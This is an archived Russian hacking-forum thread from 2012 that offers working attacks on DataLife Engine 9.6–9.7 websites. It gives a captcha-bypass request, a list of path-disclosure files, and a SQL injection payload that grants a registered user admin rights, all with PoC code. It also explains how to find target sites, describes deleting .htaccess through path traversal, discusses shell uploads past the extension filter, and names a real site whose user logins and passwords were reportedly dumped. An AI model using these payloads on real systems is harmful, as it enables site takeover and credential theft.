ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.11.2012, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
730
Репутация:
0
|
|
Как заливаться на дле 9,6-9,7 подскажет кто нибудь?
|
|
|
|
18.11.2012, 08:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
DLE 0day Captcha bypass
Обходим стандартную каптчу на последних версиях скрипта (в т.ч. 9.7)
на примере регистрации
Код:
Code:
POST /?do=register
dle_rules_accept=yes
set_direction_sort=1
dledirection=desc
set_new_sort=sec_code_session
dlenewssortby=date
sec_code=date
name=name
email=email@example.com
password1=pass
password2=pass
submit_reg=register
PoC
Стандартный генератор каптчи записывает значение секретного кода в сессию:
engine/modules/antibot.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$im[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]genrandomimage[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$im[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]genstring[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$im[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]keystring[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
А в файле engine/init.php есть код определения порядка сортировки:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'set_new_sort'[/COLOR][COLOR="#007700"]] ) and[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'allow_change_sort'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]$allowed_sort[/COLOR][COLOR="#007700"]= array (
[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'rating'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'news_read'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'comm_num'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$find_sort[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'set_new_sort'[/COLOR][COLOR="#007700"]] ) );
[/COLOR][COLOR="#0000BB"]$direction_sort[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'set_direction_sort'[/COLOR][COLOR="#007700"]] ) );
if ([/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dlenewssortby'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$allowed_sort[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dledirection'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"desc"[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dledirection'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"asc"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$find_sort[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dlenewssortby'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$direction_sort[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dledirection'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_no_cache'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"];
}
}
}[/COLOR][/COLOR]
он позволяет записать одно из фиксированных значение в произвольное поле сессии.
Подставляем одно из возможных значение в поле sec_code_session и передаем его же вместо кода проверки
(c) SecondLife
|
|
|
|
18.11.2012, 08:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Path disclousure
Path disclousure версия 9.7 и ниже
Файлы:
Код:
Code:
/engine/ajax/allvotes.php
/engine/ajax/antivirus.php
/engine/ajax/complaint.php
/engine/ajax/deletecomments.php
/engine/ajax/editcomments.php
/engine/ajax/editnews.php
/engine/ajax/find_relates.php
/engine/ajax/message.php
/engine/ajax/newsletter.php
/engine/ajax/poll.php
/engine/ajax/search.php
/engine/ajax/typograf.php
/engine/ajax/adminfunction.php
/engine/ajax/clean.php
/engine/ajax/rebuild.php
/engine/ajax/rss.php
/engine/ajax/sitemap.php
/engine/ajax/templates.php
/engine/ajax/upload.php
запрос:
Код:
Code:
POST %file%
login=
(c) SecondLife
|
|
|
|
18.11.2012, 08:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
SQL injection 0day
SQL injection 0day и получение админки для 9.7 и младше
Requirements:
Код:
Code:
user account
register_globals on
magic_quotes_gpc off
Файл - максимальная версия скрипта
Код:
Code:
/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7
Request
Код:
Code:
POST %file%
_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit
PoC
Неопределенная переменная $_TIME в некоторых случаях, внедрение кода в UPDATE запрос в файле /engine/modules/sitelogin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set hash='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$hash[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', lastdate='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_TIME[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', logged_ip='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' WHERE user_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
(c) SecondLife
|
|
|
|
20.11.2012, 01:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
42267
Репутация:
5
|
|
Сообщение от SecondLife
SecondLife said:
SQL injection 0day и получение админки для 9.7 и младше
Requirements:
Код:
Code:
user account
register_globals on
magic_quotes_gpc off
Файл - максимальная версия скрипта
Код:
Code:
/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7
Request
Код:
Code:
POST %file%
_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit
PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set hash='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$hash[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', lastdate='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_TIME[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', logged_ip='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' WHERE user_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
(c) SecondLife как юзать??)))
|
|
|
|
20.11.2012, 01:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Ищешь сайт подходящий по требованиям, регаешь там учетку, делаешь POST запрос к любому из файлов в списке и отправляешь необходимый набор полей подставив свой логин и пароль
|
|
|
|
20.11.2012, 14:20
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от SecondLife
SecondLife said:
SQL injection 0day и получение админки для 9.7 и младше
Requirements:
Код:
Code:
user account
register_globals on
magic_quotes_gpc off
Файл - максимальная версия скрипта
Код:
Code:
/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7
Request
Код:
Code:
POST %file%
_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit
PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set hash='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$hash[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', lastdate='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_TIME[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', logged_ip='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' WHERE user_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
(c) SecondLife Неотказался бы от примера использования данной баги
|
|
|
22.11.2012, 22:31
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 0
Провел на форуме:
131
Репутация:
0
|
|
Сообщение от romagaisin
romagaisin said:
может кто скажет как снести htaccess в девятки
если есть доступ к БД(phpmyadmin к примеру) заливаешь любой файл с допустимым форматом потом в таблице dle_files меняешь у файла значение onserver на .htaccess и удаляешь файл через админку. Вместо загруженного файла удалится .htaccess
Таким же образом можно удалить в принципе любой .htaccess если вписывать типа ../.htaccess
Осталось выяснить как залить шеллку в обход
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"php"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"phtml"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]".htaccess"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
25.11.2012, 10:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Сообщение от DcZ
DcZ said:
если есть доступ к БД(phpmyadmin к примеру) заливаешь любой файл с допустимым форматом потом в таблице dle_files меняешь у файла значение onserver на .htaccess и удаляешь файл через админку. Вместо загруженного файла удалится .htaccess
Таким же образом можно удалить в принципе любой .htaccess если вписывать типа ../.htaccess
Осталось выяснить как залить шеллку в обход
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"php"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"phtml"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]stripos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$serverfile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]".htaccess"[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]"Hacking attempt!"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
perl шеллы, не?
|
|
|
|
28.11.2012, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
39202
Репутация:
-5
|
|
Сообщение от Datax
Datax said:
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
Раскручивайте дальше сами, я например вытаскивал все пароли и логины. кто начал раскручивать данную скулю? подскажите с чего начать то?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
